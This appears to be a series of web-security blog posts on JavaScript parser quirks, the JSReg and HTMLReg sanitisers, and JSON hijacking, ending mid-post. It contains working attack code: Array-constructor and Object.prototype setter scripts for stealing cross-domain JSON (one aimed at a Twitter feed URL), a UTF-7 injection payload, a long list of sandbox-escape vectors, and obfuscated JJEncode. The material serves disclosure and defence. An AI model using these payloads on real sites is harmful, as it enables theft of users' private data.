Unicode monster is back, this time eating Chrome

It appears this unicode monster keeps chomping away at JavaScript parsers; this time it’s Chrome. There was an excellent post from Jack Masa about JavaScript comments. In it he describes how Chrome allows any character whose code ends in 2a or 2f (\uxx2a+\u002f) to be used as a “*” or “/”. Pretty crazy, I’m sure you’ll agree, but nice.

So I thought maybe Chrome has the same problems as Opera when parsing unicode escapes. Of course it does.


uuuu=alert;\u\u\u\u(1)

Yuk I don’t want backslashes in my variables thanks.

So does it go deeper? Of course it does.


eval("Object.defineProperty(window,'u661',{get:function(){alert(1)}});\\u61");

Here I think the parser moves back a character and outputs the 6 twice.

Tested on 15.0.849.0 dev-m

Decoding non-alphanumeric code with Hackvertor

I saw this post from Thomas Stig Jacobsen. He uses eval to decompile the code; I thought there had to be a better way :) so in literally about 30 minutes, after a few tweaks to the JSReg code base, I managed to do it. What does non-alphanumeric JavaScript look like?


$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"(\\\"\\"+$.__$+$.__$+$.___+$.$$$_+(![]+"")[$._$_]+(![]+"")[$._$_]+$._$+",\\"+$.$__+$.___+"\\"+$.__$+$.__$+$._$_+$.$_$_+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$._$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\\"\\"+$.$__+$.___+")"+"\"")())();

Produced by my friend Yosuke Hasegawa using his JJEncode.

How the hell do you decode that, Gareth? (I hear you say.) Quite easily actually. First off I extend the Hackvertor environment to allow sandboxed code to call the JSReg parser.


parser.extendWindow("$sandbox$", function(code){});

This makes “sandbox” a global function within each tag. I need to do this because I want to listen for any calls to “Function” and, instead of eval’ing the results, simply return the string generated. To do this I add more code to the “sandbox” function to create an instance of JSReg and execute the code:-


parser.extendWindow("$sandbox$", function(code){
var js = JSReg.create(), result;
js.setDebugObjects({doNotFunctionEval:true,functionCode: function(code) {
code = code.replace("J.F();var $arguments$=J.A(arguments);",'');
result = code;
}});
try {
js.eval(code);
} catch(e){
return e;
}
return result;
});

So as you can see, the magic happens in the debug objects of JSReg. I use “doNotFunctionEval” to listen to Function without eval’ing the code sent, then I use another listener, “functionCode”, to intercept the results.

The final Hackvertor tag is dead simple:-

(function(){
return sandbox(code);
})();

The final results can be seen here:-
Decode non-alpha
Please feel free to go whoa now. That’s sandboxed code calling an unsandboxed function, sending a non-alpha string, sandboxing it, listening to the results and returning the decoded code. In the blink of an eye :)
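
The idea of listening for calls to Function and handing back the source string instead of running it can be sketched outside JSReg. This is only an illustration under assumptions: captureFunctionBodies is a made-up helper, not part of JSReg or Hackvertor, and the monkey-patch below is not a sandbox, so it should only ever be fed code you trust.

```javascript
// Hypothetical helper (not JSReg API): records the strings passed to Function
// while run() executes, without compiling them.
function captureFunctionBodies(run) {
  var original = Function.prototype.constructor;
  var bodies = [];
  // (0)["constructor"]["constructor"] resolves to Function.prototype.constructor,
  // which is the lookup JJEncode-style code relies on.
  Function.prototype.constructor = function () {
    bodies.push(String(arguments[arguments.length - 1]));
    return function () {}; // hand back a no-op instead of compiled code
  };
  try {
    run();
  } finally {
    Function.prototype.constructor = original; // always restore the real one
  }
  return bodies;
}

var capturedBodies = captureFunctionBodies(function () {
  (0)["constructor"]["constructor"]("alert(1)")();
});
// capturedBodies now holds the string "alert(1)"; nothing was executed.
```

Nested calls such as JJEncode’s Function(Function(...)())() need the inner call to be evaluated before the final string exists, which this sketch deliberately does not do.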

Credits as always to Lever_One and Jonas Magazinius for testing JSReg and making this possible.

The JSON specification is now wrong

ES5 treats \u2028 and \u2029 (line/paragraph separators) as new lines in JavaScript, for whatever reason, which brings them in line with the regex “\s” character class. The JSON specification (to my knowledge) wasn’t changed, so although it mentions escaping characters within strings, escaping these two isn’t a requirement. This means we’re left with \u2028 and \u2029 characters that can break entire JSON feeds, since the string will contain a new line and the JavaScript parser will bail out.

Another interesting fact is that Crockford’s regex in the JSON specification is also wrong, correct at the time but now wrong =)


text='{"abc":"abc\u2029aa"}';
var my_JSON_object = !(/[^,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/.test(
text.replace(/"(\\.|[^"\\])*"/g, ''))) &&
eval('(' + text + ')');

This will reach the eval, since the test doesn’t account for line/paragraph separators, and the eval will then raise a syntax error because a new line is encountered inside the string.

This is also true of most native JSON parsers in various browsers, for example the following:
eval("("+JSON.stringify({a:'a\u2029a'})+")")

Will bail out because the paragraph separator isn’t escaped.
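
One way to sidestep the problem when JSON text is going to be evaluated or embedded as JavaScript is to escape the two separators after serializing. A minimal sketch, where escapeLineSeparators is a made-up helper name rather than anything from the JSON specification or a library:

```javascript
// Hypothetical helper: replaces raw U+2028/U+2029 with their \u escapes so the
// JSON text is also safe to treat as JavaScript source.
function escapeLineSeparators(jsonText) {
  return jsonText
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

var unsafeJson = JSON.stringify({a: 'a\u2029a'});   // contains a raw paragraph separator
var safeJson = escapeLineSeparators(unsafeJson);    // contains the six characters \u2029 instead
var roundTripped = JSON.parse(safeJson);            // still decodes to the original value
```

JSON.parse accepts both the raw and the escaped form, so the escaped output stays valid JSON.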

JSReg down but not out

A few months ago some very talented people, Jonas Magazinius aka @internot_ and Alexey Silin aka @lever_one, broke JSReg. Maybe broke is the wrong word; obliterated is more accurate. This was very humbling for me. I knew it wasn’t perfect, which is why I tried to tempt them to break it by stating it was unbreakable :) and it worked: they broke it so much more than I was hoping. I must admit I considered abandoning the project since the root of the code was rotten. Over the following months I slowly rewrote it, taking a different approach, and today I hit some inspiration and managed to finish off what I had started.

The core of the last version was centred around regexes. I had to slightly adjust this path and allow a mix of regexes and states. Since I’m a rookie at parsers, I decided to take the approach of tokenizing and rewriting in one step. I read many recommendations to tokenize your code first and then parse it, but I feel it can be done at once.

So the modified loop looks something like this:-

pos = 0;
left = 0;
while(pos < code.length) {
chr = code.substr(pos, 1);
prevText = code.substr(0, pos);
currentText = code.substr(pos);
next = code.substr(pos+1, 1);
prev = code.substr(pos-1, 1);
....
} else if(test(objectIdentifiers, currentText)) {
matchStr = match(objectIdentifiers, currentText);
pos += matchStr.length;
output += rewriteObjectIdentifiers(matchStr);
left = 0;
lastState = 'objectIdentifiers';
....

Instead of using just a String replace, I loop char by char and move the position along when a regex matches, alongside any parsing I do without regexes. This way I can have a nice mixture of both. I had to give regex literal detection its own state machine since regexes are very difficult to parse, especially with the IE bugs that Lever_One found. Consider the following regex on IE7 (provided by Lever_One):


/[]/]/,alert(1)

So IE7 seems to continue parsing as a regex when it encounters a blank regex class. Thankfully this is fixed in IE9 standards mode.
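
The position-based loop described earlier in this post, mixing regex matches with hand-written state, can be sketched in a self-contained form. This is a toy under assumptions, not JSReg’s real code: the rewriteSketch name, the identifier regex and the $...$ wrapping are all invented for illustration, and numbers, comments and regex literals are not handled.

```javascript
// Toy rewriter: walks the source by position, using a regex for identifiers
// and a small hand-written scanner for string literals.
function rewriteSketch(code) {
  var identifier = /^[A-Za-z_$][\w$]*/;
  var pos = 0, output = '', lastState = 'start';
  while (pos < code.length) {
    var chr = code.charAt(pos);
    var currentText = code.slice(pos);
    if (chr === '"' || chr === "'") {
      // State-based part: scan to the closing quote, skipping escaped characters.
      var end = pos + 1;
      while (end < code.length && code.charAt(end) !== chr) {
        end += code.charAt(end) === '\\' ? 2 : 1;
      }
      output += code.slice(pos, end + 1); // copy the string literal untouched
      pos = end + 1;
      lastState = 'string';
    } else if (identifier.test(currentText)) {
      // Regex-based part: consume the whole match and emit a rewritten form.
      var matchStr = currentText.match(identifier)[0];
      output += '$' + matchStr + '$';
      pos += matchStr.length;
      lastState = 'identifier';
    } else {
      output += chr; // anything else is copied one character at a time
      pos += 1;
      lastState = 'other';
    }
  }
  return output;
}

var rewritten = rewriteSketch('a="b c";d(1)');
```

Tracking lastState is what later lets a parser of this shape decide, for example, whether a “/” starts a regex or is a division.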

To fix other bugs I started to track parentheses and check for curly braces after for/if statements etc. This fixed many of the vectors where missing curlies confused the state of JSReg. Because I’ve collected a huge amount of vector data thanks to Jonas and Alexey, I created an automated check of previous vectors. If you are trying to write something similar to JSReg then the following might help you.


//sandbox vectors by Jonas Magazinius, Alexey Silin and other sla.ckers
var tests = ['/lo\\[/;log($placeholder$);;/lo/;','/lo\\/;log($placeholder$);;/lo/;',
'/[/;lo="]/;log($placeholder$);//";','/lo\\//,/;lo=/;log($placeholder$);//;',
"lo=''/**/;log($placeholder$);//';",'/**/log/**/($placeholder$/**//**/);',
"/lo/+/'//log($placeholder$);//';","/lo='/?log($placeholder$);:''",
"[/lo='/];log($placeholder$+'');","
lo=';log($placeholder$+'')",
";log($placeholder$+'')","1/ /x='/;log($placeholder$+'');",
"1/(/x='/);log($placeholder$+'');","0/0/*lo='*/+log($placeholder$+'')",
"[/lo='/];log($placeholder$+'');",'/[;\nlo="]/&log($placeholder$+"");',
'alert(1===/x/ /1+/**/log($placeholder$)/**/)',"(0)[/[']/+log($placeholder$);+']/']",
'(/[/]/)[/(\/\))\/+log($placeholder$);+"\/"/i]',"[/lo='/];log($placeholder$+'');",
'/\\\\\',"m","/;lo=");log($placeholder$);//";','<>lo="<\/>;log($placeholder$);;""',
'
;log($placeholder$);;lo="";','<{\'_\'} {\'o\'}="\\"/>,log($placeholder$);//"\n\n\'/,log($placeholder$);,"lo/";',
"1/\n/lo='/,log($placeholder$+'')","<È>x=';log($placeholder$+'')","
lo=';log($placeholder$+'')",
";log($placeholder$+'')","1/ /x='/;log($placeholder$+'');",
"1/(/x='/);log($placeholder$+'');", "0/0/*lo='*/+log($placeholder$+'')",
"{}/lo='/,log($placeholder$);//'",'_:/\\[/+log($placeholder$);/i','{}/\[/+log($placeholder$);/i','typeof/\[/+log($placeholder$);/i',
'0?0:/\\[/+log($placeholder$);/i','delete/\\[/+log($placeholder$);/i','void/\\[/+log($placeholder$);/i','with({})/\\[/+log($placeholder$);/i',
'if(1)/\\[/+log($placeholder$);/i','while(1)/\\[/+log($placeholder$);/i','try{/\\[/+log($placeholder$);/i}catch(a){}',
'throw/\\[/+log($placeholder$);/i','(function(){return/\\[/+log($placeholder$);/i})()','do{/\\[/+log($placeholder$);/i}while(1)',
'switch(0){case 0:/\\[/+log($placeholder$);/i}','_:/(]\\[)/+log($placeholder$);//]',"_:/'/+log($placeholder$);/i",
"_:<{'x'}>'+log($placeholder$);//'","_:/{/;log($placeholder$);//","_:/\\(/;log($placeholder$);//","_:/ /+log($placeholder$);//",
'+{}/ /lo="/,log($placeholder$);//"',"/[]/,'lo]/,log($placeholder$);//'",
"/[^]/,'lo]/,log($placeholder$);//'","$='@mozilla.org/js/function';\n$::['log']($placeholder$);","true/'/'+log($placeholder$);+''","this/'/'+log($placeholder$);+''",
"undefined/'/'+log($placeholder$);+''","null/'/'+log($placeholder$);+''","false/'/'+log($placeholder$);+''","Infinity/'/'+log($placeholder$);+''","NaN/'/'+log($placeholder$);+''",
"+{}\n{}/lo='/,log($placeholder$);//'","0?0:{}/log($placeholder$);/i","switch(0){case {}/log($placeholder$);/i:1}",
"+function(){1}/log($placeholder$);/lo","~\n{}/log($placeholder$);/lo","lo:{}/'/,log($placeholder$);//'",
"lo:function x(){1}/'/,log($placeholder$);//'","0\n{}/lo='/,log($placeholder$);//'",
"i=0,i++\n{}/lo='/,log($placeholder$);//'","var È=È/log($placeholder$);/È",
"lo:{}/'/,log($placeholder$)//'","lo:function x(){1}/'/,log($placeholder$)//'",
"0\n{}/lo='/,log($placeholder$)//'","i=0,i++\n{}/lo='/,log($placeholder$)//'",
"(function lo(){1})(1,/'/);log($placeholder$)//'","{}'lo'.replace(/'/,\"\"),log($placeholder$)//'",
"var È=È/log($placeholder$)/È","var lo=0?\nlo:{}/log($placeholder$)/0","~{\nlo1:{lo2:1}/log($placeholder$)/1\n}",
"(\n{lo:1}/log($placeholder$)/1\n)","{lo1:\n{lo2:1}/'/,log($placeholder$)//'\n}",
"[\n{lo:1}/log($placeholder$)/1\n]","1?\n{}/log($placeholder$)/i:0",
"0?0?\nlo:lo:{}/log($placeholder$)/1","0\n{/'lo/,log($placeholder$)//'}",
"while(0)/'/;log($placeholder$)//","if(0)/'/;log($placeholder$)//","for(;0;)/'/;log($placeholder$)//","with(0)/'/;log($placeholder$)//",
"0/function(){}/log($placeholder$)//","1\n~/'lo/+log($placeholder$)//'",
"true\n{}/'lo/+log($placeholder$)//'",
"1?\nfunction lo(){1}/log($placeholder$)/1:1",
"var i=1\ni+++\n{lo:1}/log($placeholder$)/1",
"[\nfunction(lo){}/log($placeholder$)/1\n]",
"(function(){}['constructor'])('log($placeholder$)')()",
"(function(){}/log($placeholder$)/1)",
"1 "1 "[]instanceof{}/log($placeholder$)//",
"[]in{}/log($placeholder$)//",
"var n\n/'lo/+log($placeholder$)//'",
"for (i=0;i<1;i++){\nif(0) continue\n{}/'lo/+log($placeholder$)//'}",
"for (i=0;i<1;i++){\nif(0) break\n{}/'lo/+log($placeholder$)//'\n}",
"x:for (i=0;i<1;i++){\nif(0) continue x\n/'lo/+log($placeholder$)//'\n}",
"x:for (i=0;i<1;i++){\nif(0) break x\n/'lo/+log($placeholder$)//'\n}",
"if(0)0\nelse {}/'lo/,log($placeholder$)//'",
"try{}\ncatch(e){}\nfinally{}/'lo/,log($placeholder$)//'",
"for(;\n{}/log($placeholder$)/1\n;lo)0",
"try{x}\ncatch(lo if(1)/log($placeholder$)/1){}",
//dos vectors
"_:/\[/","_:/'/","_:/(]\\[)/","_:/ / /**/","0/function(){}/","function()[]"
];

That's about it. I want to thank Jonas Magazinius and Alexey Silin once again for their great work; you should hire those guys if you have a JS sandbox that needs testing.

Think you can break JSReg too? Visit here for the demo:-
JSReg demo

and report any bugs here:-
JSReg bugs

JSON Hijacking

There isn’t a lot of information about JSON hijacking out there at the minute, so I will aim to provide a “news update” on the state of publicly known techniques. First off I will give a quick overview of how JSON data can be stolen and explain how JavaScript reads JSON.

JavaScript’s quirky nature

There is a little quirk in how JavaScript reads objects; it is a syntax oversight. When a “{” is first encountered, if no other statement appeared before it and it does not occur inside another object, then the code is treated as a block statement. A block statement is simply a collection of one or more JavaScript statements inside a block of curly braces. Here is an example of a block statement:


{1+1,alert('I am a block statement')}

You might have seen code like the following when related to JSON:

eval('('+JSON_DATA+')');

Notice the beginning and ending parentheses; these force JavaScript to execute the data as an object, not the block statement mentioned above. If JavaScript did attempt to execute JSON data without the parentheses, and the JSON data did in fact begin with “{”, then a syntax error would occur because the block statement would be invalid. To the eval statement the JSON data would look like this:


{"name":"Gareth"}

Because the “{” begins the data, it is in block statement mode and the “name” part is treated as a string literal. When the colon is encountered it raises a syntax error, because a colon cannot occur after a string unless it’s part of a ternary statement. Hopefully now you’ll see why some code uses eval with enclosing parentheses. I’d like to mention that using eval directly on JSON data is bad practice; you are far better off validating the data first or using the browser’s native JSON object to read the data, but it illustrates my point well for understanding how the JSON data is parsed.
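
The difference can be checked directly. A small sketch (the variable names are only for illustration) comparing the bare eval, the parenthesised eval and the native JSON object:

```javascript
var JSON_DATA = '{"name":"Gareth"}';

var bareEvalError = null;
try {
  eval(JSON_DATA);                 // "{" starts a block statement, so the colon is rejected
} catch (e) {
  bareEvalError = e.name;
}

var viaEval = eval('(' + JSON_DATA + ')');   // parentheses force an object literal
var viaParse = JSON.parse(JSON_DATA);        // preferred: parses data without executing code
```

JSON.parse is the safer choice because it never runs the input as code, whereas either eval form will execute whatever the feed contains.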

The question is what sort of code would execute an object literal when JSON data is encountered? The most common scenario is when the data is placed inside an array literal. Remember from my previous explanation that a “{” is only treated as a block statement when nothing appears before it and it does not occur inside another object, so the following are valid object literal statements:


1,{"I am an object":"Literal"}
~{"I am an object":"Literal"}
1+{"I am an object":"Literal"}
[{"I am an object":"Literal"}]

The last example is the one we’re most interested in, because many sites use this form of JSON structure. Notice that no variable is assigned for the array literal and the JSON data is executed directly to obtain its contents, but how would you steal this data cross-domain?

Array constructor clobbering

You now know what sort of JSON structure you’re looking for. In the past it was possible in Firefox to clobber the array constructor [1]. This means we could overwrite the array behaviour before the JSON data was read. Then, because we had control over the array, we could read the data as it was passed in. It looked like this:


function Array() {
for(var i=0;i<arguments.length;i++) {
alert(arguments[i]);//contains each friend object
}
}
//X-DOMAIN JSON
<script src="somesocialnetwork.com/friends"> </script>
//JSON DATA CONTAINS: [{"friend1":"Test1"},{"friend2":"Test2"}]

As you can see, this is how the data was stolen: each object was passed to our function via the arguments, so you could read the data from an external inclusion of it. Unfortunately or fortunately, depending on your perspective, this was fixed in Firefox by not calling the constructor for array literals. Note that this is a non-standard fix for security’s sake. Other browsers still implement that functionality. We can still demonstrate the past attack, though, by using the Array constructor directly so you can see how it worked:


function Array() {
for(var i=0;i<arguments.length;i++) {
for(var j in arguments[i]) {
alert(j+'='+arguments[i][j]);
}
}
}
;Array({"friend1":"Test1"},{"friend2":"Test2"})
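
To see the difference between a literal and a direct call on a current engine, here is a small sketch. It assumes an engine that follows ES5, where array literals are built with the built-in constructor regardless of what the name Array refers to; the arrayDemo name and the call counter are only for illustration.

```javascript
var arrayDemo = (function () {
  var calls = 0;
  // Shadows the built-in Array inside this function only.
  function Array() {
    calls += 1;
  }
  var literal = [{"friend1": "Test1"}, {"friend2": "Test2"}]; // does not reach our Array
  var callsAfterLiteral = calls;
  Array({"friend1": "Test1"}, {"friend2": "Test2"});          // direct call does
  return {
    literal: literal,
    callsAfterLiteral: callsAfterLiteral,
    callsAfterDirectCall: calls
  };
})();
```

On such an engine the counter only moves for the direct call, which is why the replay above has to invoke Array explicitly.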

Object prototype setters

What works now? Well, we can still conduct the same attack using another method. In Firefox this method is now fixed due to my demonstration of a Twitter privacy issue [2][3]. However, many other browsers including Chrome, Opera and Safari still allow this attack (they don't consider it a flaw). In order to understand the attack you need to understand how setters work. Setters are called when an attempt is made to modify an object's data. If you try the following example in Firefox, Chrome, Opera or Safari you will see how they work:


window.__defineSetter__('x', function() {
alert('x is being assigned!');
});
window.x=1;

The example should alert "x is being assigned!". __defineSetter__ is a special method that allows you to attach a setter to an object. The first argument is the name of your setter, in this case "x", and the second argument is the function you wish to call; the setter is attached to whichever object you called the __defineSetter__ method on.
Now that you know how they work, you can use this technique to steal JSON data by applying it to the Object prototype. The Object prototype is an object that every other object inherits from in JavaScript; if you create a setter on the name of your target JSON data then you can get the value of the data. This time I'll show you a real world attack on Twitter that was fixed. My original article was called "I Know what your friends did last summer" [4]; it was a play on the really bad horror films and the fact you could know who your friends are on Twitter and basically what they were doing and where. Joe Walker also discovered this technique separately [5].


<script>
Object.prototype.__defineSetter__('user',function(obj){
for(var i in obj) {
alert(i + '=' + obj[i]);
}
});
</script>
<script defer="defer" src=https://twitter.com/statuses/friends_timeline/>
</script>

The first part of the script uses __defineSetter__ on the Object prototype with "user" as the property; Twitter used the "user" property to store an object about the user in the JSON data. The script then loops through the object and reads the data about the user, which would be name, email, location etc. The second part actually includes the Twitter JSON feed.

New attacks

If you have partial control over some of the JSON data it's possible to steal the data by manipulating it using UTF-7. For example if you control the "email" field of the JSON data you could encode it in such a way that when it's included it exposes the rest of the data.


[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJw
BNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdw
BpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAb
wBiACcAOgAnAGQAbwBuAGU-'}]

You can then include the JSON data using a script tag with the UTF-7 charset which converts the +- encoded string to:

[{'friend':'luke','email':''}];alert('May the force be with you');[{'job':'done'}]
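
To check what the browser ends up seeing, the +...- run can be decoded by hand: UTF-7 encodes it as base64 over UTF-16 code units. The decoder below is a minimal sketch written for this payload (decodeUtf7Sketch is a made-up name, and it ignores corner cases of the UTF-7 format such as surrogate handling).

```javascript
// Minimal UTF-7 decoder sketch: expands each +base64- run into UTF-16 code units.
function decodeUtf7Sketch(text) {
  var alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
  return text.replace(/\+([A-Za-z0-9+\/]*)-?/g, function (whole, b64) {
    if (b64 === '') { return '+'; }       // "+-" stands for a literal plus sign
    var bits = 0, bitCount = 0, out = '';
    for (var i = 0; i < b64.length; i++) {
      bits = (bits << 6) | alphabet.indexOf(b64.charAt(i));
      bitCount += 6;
      if (bitCount >= 16) {               // a full 16-bit code unit is available
        bitCount -= 16;
        out += String.fromCharCode((bits >> bitCount) & 0xFFFF);
        bits &= (1 << bitCount) - 1;      // keep only the leftover low bits
      }
    }
    return out;
  });
}

// The payload from this post, joined back into one string.
var utf7Payload = "[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJw" +
  "BNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdw" +
  "BpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAb" +
  "wBiACcAOgAnAGQAbwBuAGU-'}]";
var decodedPayload = decodeUtf7Sketch(utf7Payload);
```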

Our email field is being closed and manipulated so we can inject our own JavaScript, this way we could steal the data by using timeouts or function calls on the array data. The user "luoluo" from a comment on my blog provides a good example:


[{'friend':'luke','email':''}, 1].sort(function(x,y) {
for (var o in x) {
alert(o + ":" + x[o]);
}
});
setTimeout(function() {
var x = data[0];
for (var o in x) {
alert(o + ":" + x[o]);
}
}, 100);var data=[{'job':'done'}];

ES5 functionality

If __defineSetter__ is not available there is a standards-based alternative that may allow JSON stealing to continue. Using the defineProperty or defineProperties methods of Object you could conduct a similar attack, which varies in syntax only slightly.


Object.defineProperty(window,'x',{set: function() {
alert('x is being assigned!');
}});
window.x=1;

As you can see the syntax is very similar. This time, however, we call the method on window.Object and specify the object we wish to create the setter on in the first argument; the second argument is the name of our property and the third argument takes an object literal to define the setter. This can also be applied to the Object prototype by replacing "window" with Object.prototype, thus re-creating the Object prototype attack mentioned earlier.


Object.defineProperty(Object.prototype, 'user', {
set:function(obj) {
for(var i in obj) {
alert(i + '=' + obj[i]);
}
}
});
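
Whether such a setter actually fires depends on how the property gets created. The sketch below assumes an ES5-conforming engine, where object literals define own properties directly and so bypass inherited setters (the behaviour the Mozilla fix in [3] describes), while plain assignment still reaches the setter. The variable names are illustrative, and the setter is removed again at the end.

```javascript
var capturedUsers = [];
Object.defineProperty(Object.prototype, 'user', {
  configurable: true,                 // lets us delete the setter again below
  set: function (obj) {
    capturedUsers.push(obj);
  }
});

// Object literal: defines an own "user" property, the inherited setter is not called.
var viaLiteral = {user: {name: 'literal'}};

// Plain assignment: walks the prototype chain and calls the setter instead.
var viaAssignment = {};
viaAssignment.user = {name: 'assigned'};

delete Object.prototype.user;         // clean up so other code is unaffected
```

After this runs, capturedUsers contains only the assigned object, and viaAssignment has no own user property because the setter swallowed the write.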

Conclusion

If you are pen testing JSON feeds, make sure the web site in question prevents external inclusion of the data via script or, even better, recommend the site does not expose the data publicly if privacy will be compromised. Twitter solved the information disclosure problem by requiring authentication for its JSON and other feeds; consider doing the same if the data has to be exposed.
The flaws mentioned in this article exploit design-level bugs in how object literals and array constructors are handled. Some browser vendors do not consider them flaws as such; I have to disagree.
The root of the problem is external script inclusion across domains, which unfortunately isn’t going to go away any time soon due to the design of the web. We can lock down features in a way that they do not compromise privacy: do we really need setters on the Object prototype? If they are required, why not place some restrictions on how they can be applied across domains? I understand the vendors’ point of view: technically they are not flaws, they are features, and in a perfect world they would be used in the correct way and web sites would generate well-formed JSON feeds. But this isn’t a perfect world, and web developers make assumptions about their data. I recommend vendors follow the developers’ assumptions and prevent these types of attacks by locking down the functionality so it can’t be exploited. Developer assumptions create security holes.

References/Links

[1] Joe Walker http://directwebremoting.org/blog/joe/2007/03/05/json_is_not_as_safe_as_people_think_it_is.html
[2] Jeremiah Grossman http://jeremiahgrossman.blogspot.com/2006/01/advanced-web-attack-techniques-using.html
[3] Mozilla security https://developer.mozilla.org/web-tech/2009/04/29/object-and-array-initializers-should-not-invoke-setters-when-evaluated/
[4] http://www.thespanner.co.uk/2009/01/07/i-know-what-your-friends-did-last-summer/
[5] Joe Walker http://directwebremoting.org/blog/joe/2007/03/06/json_is_not_as_safe_as_people_think_it_is_part_2.html

Opera parser monster eats unicode

Whilst writing my own parser I found weird things in Opera’s JavaScript parser. I was testing what the various browsers allowed with unicode escapes and it turns out Opera seems more lax than others. My discovery began with the following code:


try {eval("\\u0066\\u0061\\u006c\\u0073\\u0065");} catch(e) {alert(e);}

What do you expect the undefined variable to be? It’s a unicode-encoded “false”, hehe, so we can have a variable called “false” if we use unicode escapes on Firefox, but what about Opera? Well, it’s actually looking for a variable called “false5”. Why? Because the JavaScript parser seems to be off by one when using eval with unicode escapes, so it thinks the \u006 is actually \u0065 and thus the “5” is added onto the string.

Pretty cool, so what else can we do? Well, Opera seems a bit more lax than the other browsers when it comes to unicode escapes, for example this is perfectly legal:

\u=alert,u(1)

Pretty nuts right? You can use an incorrect unicode escape and the backslash gets ignored. Another example:

\u000x=alert;u000x(1)

And finally I leave you with this, you can make \u become uu when inside an eval statement:

window.__defineGetter__("uu",function() { alert(1) });eval("\\u");
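
For contrast, here is a sketch of what an engine that follows the specification does with the same kinds of input: a complete \uXXXX escape in an identifier names the same variable as the plain character, and a malformed escape is a syntax error. The tryEval helper is invented for this example.

```javascript
// Hypothetical helper: evaluates source and reports either the value or the error name.
function tryEval(source) {
  try {
    return { ok: true, value: eval(source) };
  } catch (e) {
    return { ok: false, error: e.name };
  }
}

var validEscape = tryEval('var \\u0061bc = 5; abc');  // \u0061 is "a", so this declares abc
var bareEscape = tryEval('\\u=1');                    // "\u" with no hex digits
var truncatedEscape = tryEval('\\u000x=1');           // only three hex digits before "x"
```

If either of the last two evaluates without an error, the parser is showing the kind of laxness described in this post.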

DOM sandboxing talk

I did a talk in Leeds about DOM sandboxing with regular expressions, it went ok. I’m not the best speaker to be honest but with a bit more practice I’ll get there. Here are the slides:-

PDF version
Powerpoint slides

Blog fight round two

Thanks Pádraic

So I hope you’ve enjoyed the blog fight between me and Pádraic Brady. I sense a lack of a sense of humour in his last post :( His blanket claims that regex HTML validation sucks were obviously unjustified. Anyway, I was waiting for a cool XSS hole in HTMLReg from him; it never came :( He did raise a valid point about a “clickjacking” threat, so I decided to update HTMLReg/CSSReg to enable a site to disable all CSS positioning. Thanks very much Pádraic for reporting this issue!

Disable Positioning

HTMLReg and CSSReg now have the option “disablePositioning”. This will stop you from being able to define elements which overlap each other, which is useful in a validation scenario rather than an iframe sandbox scenario (for which HTMLReg was originally intended). It’s quite easy to use:-


HTMLReg.disablePositioning = true;
alert(HTMLReg.parse("<div style=position:absolute;></div>")); // <div></div>

Validate HTML

I didn’t stop there. While I had my IDE open, I decided to add a validate HTML option using the new “DOMParser” feature. As I looked deeper into the feature I wished I hadn’t bothered :( When invalid XML markup is encountered, IE throws an exception; FF, Opera and WebKit don’t. WebKit transforms the XML and adds a parsing error node, and FF entity-encodes. Ugh. So anyway, hopefully I made a cross-browser solution which will prevent any invalid HTML markup. This is what I came up with, which should work on newer browsers and older versions of IE:

StringtoXML = function (text) {
	try {
		if (window.DOMParser) {
			// Standards path: parse as XML and serialize the result back to a string
			var parser = new DOMParser();
			var doc = parser.parseFromString(text, 'text/xml');
			var xml = (new XMLSerializer()).serializeToString(doc);
			// Strip any leading XML declaration
			xml = xml.replace(/^<\?[^?]+\?>\s*/, '');
			// Browsers that do not throw report problems as a <parsererror> node
			if (/<parsererror[^>]+>/.test(xml)) {
				return 'Invalid HTML markup';
			} else {
				return xml;
			}
		} else if (window.ActiveXObject) {
			// Older IE path
			var doc = new ActiveXObject('Microsoft.XMLDOM');
			doc.async = false; // a boolean, not the string 'false'
			doc.loadXML(text);
			if (!doc.xml) {
				throw {};
			}
			return doc.xml;
		} else {
			return text;
		}
	} catch (e) {
		return 'Invalid HTML markup';
	}
}

Thanks Paul Stone

An excellent bug was found by Paul Stone as a result of this blog fight :) In Firefox RC4 and the latest Chrome he noticed that HTMLReg was allowing invalid CSS markup. As he quite rightly pointed out, HTMLReg was checking whether cssText contained something, but in RC4 the check wasn’t passing and as a result the invalid CSS was being allowed through. The fix was quite simple and involved removing the style attribute if the cssText check wasn’t passed. This didn’t create a security breach, as the invalid CSS was just that, invalid, and other browsers such as IE didn’t allow this markup to be executed, but it was a cool bug since HTMLReg should not allow this invalid string.

The vector looked like this:-

<div style="xxx">test</div>

The fix was simply to do this:-

if(element.getAttribute("style") !== '' && element.getAttribute("style") !== null && element.style.cssText !== '') {
...
} else {
//drop style attribute if it exists
element.style.cssText = null;
element.setAttribute("style","");
element.removeAttribute('style');
}

HTMLReg rocky is waiting

HTMLReg is in the ring waiting for you, please get in your corner and try your luck. I doubt you can win :)

Regex HTML Sanitisation can work

Dear Pádraic Brady,

